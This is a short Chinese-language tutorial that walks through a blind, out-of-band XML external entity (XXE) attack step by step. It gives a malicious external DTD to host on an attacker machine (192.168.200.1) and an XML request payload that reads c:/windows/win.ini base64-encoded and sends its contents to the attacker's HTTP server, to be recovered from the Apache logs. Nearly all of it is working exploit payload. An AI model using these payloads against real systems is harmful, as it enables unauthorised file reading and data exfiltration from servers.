思路:
与有回显的外部实体注入的区别在于,攻击的payload无法直接读取敏感信息。
攻击者先将请求发送至目标服务器,目标服务器解析请求,读取192.168.200.1内的恶意DTD,并执行,将结果作为参数来访问192.168.200.1上的http服务,攻击者通过访问192.168.200.1的http记录得到结果
首先在192.168.200.1上创建文件名为evil.xml
内容为
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.200.1/a.php?content=%file;'>"> %payload;
将刚才生成的文件存放apache的网页目录下,并开启对apache日志生成和写入
对目标进行登录操作,并且在数据包中构造如下payload
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.200.1/evil.xml">
%dtd;
%send;
]>?
发送数据包后,可以在apache的日志上看见如下图所示
